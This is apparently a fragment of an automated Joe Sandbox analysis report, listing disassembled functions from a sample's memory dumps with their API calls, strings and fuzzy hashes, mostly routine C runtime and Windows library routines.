TerminateProcess.KERNEL32(00000000,?,6CDE2D94,?,00000001,?,?), ref: 6CDE2DBE
ExitProcess.KERNEL32 ref: 6CDE2DD0

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 08a35cdacc2580d163cbee304d3e94774b94659da5838dc010d5e937350e8414
Instruction ID: 494cbf1d4fd0e7b0013f18d172f91ed15ed18028bd845a3f31b7428df7a05c1e
Opcode Fuzzy Hash: 08a35cdacc2580d163cbee304d3e94774b94659da5838dc010d5e937350e8414
Instruction Fuzzy Hash: 68E04631100208FBCF52AF54C80DA993B79EB0A249F000418FA1886A70CB35F992CBA8

Function 6CDD7FE0 Relevance: 4.4, Strings: 3, Instructions: 663COMMON

Download Yara Rule

Strings

E[Rl, xrefs: 6CDD84B3
@'1, xrefs: 6CDD87E6
E[Rl, xrefs: 6CDD8440

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID:
String ID: @'1$E[Rl$E[Rl
API String ID: 0-3644602742
Opcode ID: a1002e7604209b23b7d3fcdd1179fd21b2a6d8fead6ab9a55b2599a284074ee0
Instruction ID: 7f63a456017e25191d9e5c76ac831fd4cb78f53c0f824bcbd985e420cd02cbca
Opcode Fuzzy Hash: a1002e7604209b23b7d3fcdd1179fd21b2a6d8fead6ab9a55b2599a284074ee0
Instruction Fuzzy Hash: A6226B36E50101CFDF05CE7CDD943DE77F2AB56325F21A21AD821DB7E4C22AA9098B90

Function 0089F880 Relevance: 4.0, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

|, xrefs: 0089FA33
/:EX, xrefs: 0089F8F9
#:EX, xrefs: 0089F8A7

Memory Dump Source

Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_b.jbxd

Similarity

API ID:
String ID: #:EX$/:EX$|
API String ID: 0-1498014989
Opcode ID: f641b2e1d107a67fe1cb44df5131b8b3c9f0b50c04125af42b221465f5728ed2
Instruction ID: 4c5b653c9903287addd5dac2ab558cb282f4acf7d5a1213fa5f8abcadb0f2de8
Opcode Fuzzy Hash: f641b2e1d107a67fe1cb44df5131b8b3c9f0b50c04125af42b221465f5728ed2
Instruction Fuzzy Hash: 22511E715183919BCB18DF25C8916ABBBE1FF82344F48996CE8C6DB251E3788901CB92

Function 6CDD4810 Relevance: 3.8, Strings: 1, Instructions: 2574COMMON

Download Yara Rule

Strings

qZ, xrefs: 6CDD531C

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID:
String ID: qZ
API String ID: 0-1764783552
Opcode ID: c998fa48ce40de6362d513107b132b4dd941d33b773475d920e47b1517e19962
Instruction ID: fe049c2f96ce8e7dc60cb382a103418c72b6eccd3d58f79ac4b56ec2c2041e63
Opcode Fuzzy Hash: c998fa48ce40de6362d513107b132b4dd941d33b773475d920e47b1517e19962
Instruction Fuzzy Hash: F213EB76E402118FCF088F3CC8907CD77F2AB46359F12C559D859EBBA5C63AA94A9F10

Function 6CDEA621 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CDEA61C,?,?,00000008,?,?,6CDEA2B4,00000000), ref: 6CDEA84E

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 47309c9a35b5a511663e58304d1466a8b1dfc959bd64a769608ef7b665027ecf
Instruction ID: 6e4f9836d5018de04a52e8d3d37eb4a8c73574cb1a656bb76bcbd86d289ada6f
Opcode Fuzzy Hash: 47309c9a35b5a511663e58304d1466a8b1dfc959bd64a769608ef7b665027ecf
Instruction Fuzzy Hash: E3B1343561060ACFD705DF28C486B95BFB0FF49368F258658E8A9CF6A1C335E982CB40

Function 6CDE17D8 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CDE17EE

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 5e6578641ddbe52f9509cad09eb4f7552ce901c42bfb4ae33508515793646668
Instruction ID: a04a979d8455edaa4d0fdffff5c0d8bf2f8eb6ecfa9d6991aa0ad7a9857f0c1a
Opcode Fuzzy Hash: 5e6578641ddbe52f9509cad09eb4f7552ce901c42bfb4ae33508515793646668
Instruction Fuzzy Hash: 66517DB1F12605DBEB15CF56D88179ABBF0FB88314F20846AC529EB252D375E904CF50

Function 008BF550 Relevance: 1.5, Strings: 1, Instructions: 280COMMON

Download Yara Rule

Strings

5|iL, xrefs: 008BF720

Memory Dump Source

Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_b.jbxd

Similarity

API ID:
String ID: 5|iL
API String ID: 0-1880071150
Opcode ID: 016b9a2f7386b01bb02a0f41aaf442b213601f7d4f392b77bc51e00d59fd8080
Instruction ID: 7d69f19ab3c1c6869b778fc3433a32bab63a49af89fc5093083bfc0d7f358b29
Opcode Fuzzy Hash: 016b9a2f7386b01bb02a0f41aaf442b213601f7d4f392b77bc51e00d59fd8080
Instruction Fuzzy Hash: A2711631A082419BDB188F2CDC916ABB7D1FB95324F19C67DE9D5C73A2E7709C048786

Function 008C4370 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

@, xrefs: 008C4445

Memory Dump Source

Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_b.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 21586ac75f6ee9d420c2f888ddf1f8ad857b7154f4649b721990310c9634cdfb
Instruction ID: c818968e16e1605c0d9de8b56f41a33bbe2b64bb6e9923865622e350817d8828
Opcode Fuzzy Hash: 21586ac75f6ee9d420c2f888ddf1f8ad857b7154f4649b721990310c9634cdfb
Instruction Fuzzy Hash: 3B4100B69052118BD718DF24D821B2BB3B2FFD1328F15852CE486CB391E735D909C782

Function 008C4940 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

@, xrefs: 008C49A9

Memory Dump Source

Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_b.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6f0e467e03569edbc09609ff50d5c475ee457ef8ec1b87c741a90d483101c77e
Instruction ID: 8f854601d415f53b57bebf548aa63a6d79a8f25d9aef74bc92c34ff2103b2f24
Opcode Fuzzy Hash: 6f0e467e03569edbc09609ff50d5c475ee457ef8ec1b87c741a90d483101c77e
Instruction Fuzzy Hash: 6B312F755083049FC310EF68C8D0A6BBBF5FF99364F14982CEA94872A1D375D948CB9A

Function 6CDE5B7C Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6CDE5B7C

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 690f2ab2b671d311171d088b2819b978b5344dd1fa3b477083833ec02a345c60
Instruction ID: 9bddadee86251fb44889b2b7ab50a87dff572f302cf4361afaa33a48e5e0f837
Opcode Fuzzy Hash: 690f2ab2b671d311171d088b2819b978b5344dd1fa3b477083833ec02a345c60
Instruction Fuzzy Hash: CEA012303002008B9F804E30424460936B8571619030840255400C4040D66050A15641

Function 008A41A0 Relevance: .7, Instructions: 661COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03ae6a2c336755e2ba6070672ac64e64af8c47685f894fba98d150027eae7a79
Instruction ID: 816e0a3488f5171fd05275482511d86317c5f448ff1cf764777286b1ba1c3c68
Opcode Fuzzy Hash: 03ae6a2c336755e2ba6070672ac64e64af8c47685f894fba98d150027eae7a79
Instruction Fuzzy Hash: C8624BB0508BC08ED3328B3D8885797BFD5AB5A324F084A9DD0FA877D2C3B96505C766

Function 008A2430 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ed931de4ee897c55c21a0dcfadd7cb1f1ecbdb017de52a216f578b1882065cb
Instruction ID: 42eed48d89b794274125592da469c3c64c3c9d185d5ef6a1a05afe3fef441089
Opcode Fuzzy Hash: 6ed931de4ee897c55c21a0dcfadd7cb1f1ecbdb017de52a216f578b1882065cb
Instruction Fuzzy Hash: CB910632A042615FD726CE2C885066ABB91FB96324F19C67DE8B9CB7D2D670CC46C7C1

Function 008BC5A0 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d263c32f197d2c43102edde97da817967896f4bd7a42d44af63fb3db36c0667b
Instruction ID: 7b2c9af98381f3e037e2adf9b0c77e8721bbf1f0c1ddf2016db455d4abbb4753
Opcode Fuzzy Hash: d263c32f197d2c43102edde97da817967896f4bd7a42d44af63fb3db36c0667b
Instruction Fuzzy Hash: 06B10175E086888FDB14CBACC4513EEBBE1FB9A310F18846DD492D7392C77988058B56

Function 008BBC80 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45495a81ccf2cb6ceb8cbbf53310ecb24454d21ce8d9c6117b96b0468ddfcfb9
Instruction ID: 42466e42675596c39987f616eda9ad776a7b9d01c617bf8c0b5eba89936f78ed
Opcode Fuzzy Hash: 45495a81ccf2cb6ceb8cbbf53310ecb24454d21ce8d9c6117b96b0468ddfcfb9
Instruction Fuzzy Hash: 14515BB15087548FE314DF29D49439BBBE1FB84318F044E2DE5E987351E379DA088B82

Function 0089AF10 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 264725778cb1bb67cd01e1c22dc5135cdcadfbb74274775da8d17485ef73deb4
Instruction ID: 2f82cdb14907e052c51202a1008a789231f57cf6c9f0dea560cd333d97d41c5a
Opcode Fuzzy Hash: 264725778cb1bb67cd01e1c22dc5135cdcadfbb74274775da8d17485ef73deb4
Instruction Fuzzy Hash: 843146B29153059ADB14AF28C842623B3F5FFA1364F1D9528E899CB2C1FF788900C396

Function 6CDE3F69 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction ID: 769bd6fa7e39ee67619f80fe6cb6cd1d9e4a6b53ba92a4f05ff3e5f5aef68744
Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction Fuzzy Hash: 6AE08C32912228EBCB14CBC8C944D9AF3FCEB48B44F1144A6B509D3620D270DE00C7D0

Function 6CDE6958 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 6CDE699C

Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE88A4
Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE88B6
Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE88C8
Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE88DA
Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE88EC
Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE88FE
Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE8910
Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE8922
Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE8934
Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE8946
Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE8958
Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE896A
Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE897C

_free.LIBCMT ref: 6CDE6991

Part of subcall function 6CDE4273: HeapFree.KERNEL32(00000000,00000000,?,6CDE34AC), ref: 6CDE4289
Part of subcall function 6CDE4273: GetLastError.KERNEL32(?,?,6CDE34AC), ref: 6CDE429B

_free.LIBCMT ref: 6CDE69B3
_free.LIBCMT ref: 6CDE69C8
_free.LIBCMT ref: 6CDE69D3
_free.LIBCMT ref: 6CDE69F5
_free.LIBCMT ref: 6CDE6A08
_free.LIBCMT ref: 6CDE6A16
_free.LIBCMT ref: 6CDE6A21
_free.LIBCMT ref: 6CDE6A59
_free.LIBCMT ref: 6CDE6A60
_free.LIBCMT ref: 6CDE6A7D
_free.LIBCMT ref: 6CDE6A95

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 01d2ff62abe81e29c780f1eadbc3f513cc07aaa5d6d988c8f09993dcb32c7f92
Instruction ID: b9a186b91192a87faf355150ccd1932f148235c2870b17effc71c049332f54e9
Opcode Fuzzy Hash: 01d2ff62abe81e29c780f1eadbc3f513cc07aaa5d6d988c8f09993dcb32c7f92
Instruction Fuzzy Hash: 31314C31A04609DFEB109FB9E844B9A77E8EF08318F20C52AE169D7A74DB70E955C734

Function 6CDE3B33 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6CDE3B49

Part of subcall function 6CDE4273: HeapFree.KERNEL32(00000000,00000000,?,6CDE34AC), ref: 6CDE4289
Part of subcall function 6CDE4273: GetLastError.KERNEL32(?,?,6CDE34AC), ref: 6CDE429B

_free.LIBCMT ref: 6CDE3B55
_free.LIBCMT ref: 6CDE3B60
_free.LIBCMT ref: 6CDE3B6B
_free.LIBCMT ref: 6CDE3B76
_free.LIBCMT ref: 6CDE3B81
_free.LIBCMT ref: 6CDE3B8C
_free.LIBCMT ref: 6CDE3B97
_free.LIBCMT ref: 6CDE3BA2
_free.LIBCMT ref: 6CDE3BB0

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8d0603224a275c8683147d6c84845a7ba3abb9e501501042f1b644fde2144a1c
Instruction ID: 2072c2fa5d50dbfba4eff300c5ffdc81f3b743cea28b816ccdb841a9428e707c
Opcode Fuzzy Hash: 8d0603224a275c8683147d6c84845a7ba3abb9e501501042f1b644fde2144a1c
Instruction Fuzzy Hash: C2218576D04108FFCF41DFD4C884DDE7BB9AF08244F0081A6A6159B635DB71EA58CBA4

Function 6CDE2110 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 6CDE2147
___except_validate_context_record.LIBVCRUNTIME ref: 6CDE214F
_ValidateLocalCookies.LIBCMT ref: 6CDE21D8
__IsNonwritableInCurrentImage.LIBCMT ref: 6CDE2203
_ValidateLocalCookies.LIBCMT ref: 6CDE2258

Strings

csm, xrefs: 6CDE21ED

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: ce8da64769ec86690e3acafb58d51eec126dcece9f397e60415a0eaa7af780d1
Instruction ID: 4223378f314a7f72bffd09648bdb0f669f0b5a4f0197cea31d0341957df23f44
Opcode Fuzzy Hash: ce8da64769ec86690e3acafb58d51eec126dcece9f397e60415a0eaa7af780d1
Instruction Fuzzy Hash: 5B418534A0120ADBCF00CF69CC48A9EBBB5AF4932CF148156E9185BBA1D775EA45CB91

Function 6CDE579A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

api-ms-, xrefs: 6CDE57F1
ext-ms-, xrefs: 6CDE5805

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: d871e4c8fdca76d2d7a0ad1005ac56d3cb7f89090e755d86ee0434a43c70c586
Instruction ID: a41692c5f94b10059d55869611bcfe343b9119275919e2cc3a73d61c993534a2
Opcode Fuzzy Hash: d871e4c8fdca76d2d7a0ad1005ac56d3cb7f89090e755d86ee0434a43c70c586
Instruction Fuzzy Hash: 9021D831A06321EBDB1197258CC4A0ABA789F4E7F8F211624ED55AB6B1F630F90085E4

Function 6CDE8A26 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CDE89EE: _free.LIBCMT ref: 6CDE8A13

_free.LIBCMT ref: 6CDE8A74

Part of subcall function 6CDE4273: HeapFree.KERNEL32(00000000,00000000,?,6CDE34AC), ref: 6CDE4289
Part of subcall function 6CDE4273: GetLastError.KERNEL32(?,?,6CDE34AC), ref: 6CDE429B

_free.LIBCMT ref: 6CDE8A7F
_free.LIBCMT ref: 6CDE8A8A
_free.LIBCMT ref: 6CDE8ADE
_free.LIBCMT ref: 6CDE8AE9
_free.LIBCMT ref: 6CDE8AF4
_free.LIBCMT ref: 6CDE8AFF

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
Instruction ID: 007ac3d7a8dbc4299f004e5d3b15991b25003e2174c5cf9dab84590991a3e9fb
Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
Instruction Fuzzy Hash: F011EF71D41F04AAD920ABB4CC4AFCF7BDD6F09704F408816A299A6A70DB65F6188771

Function 6CDE7B3F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CDE7B87
__fassign.LIBCMT ref: 6CDE7D6C
__fassign.LIBCMT ref: 6CDE7D89
WriteFile.KERNEL32(?,6CDE6323,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CDE7DD1
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CDE7E11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CDE7EB9

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

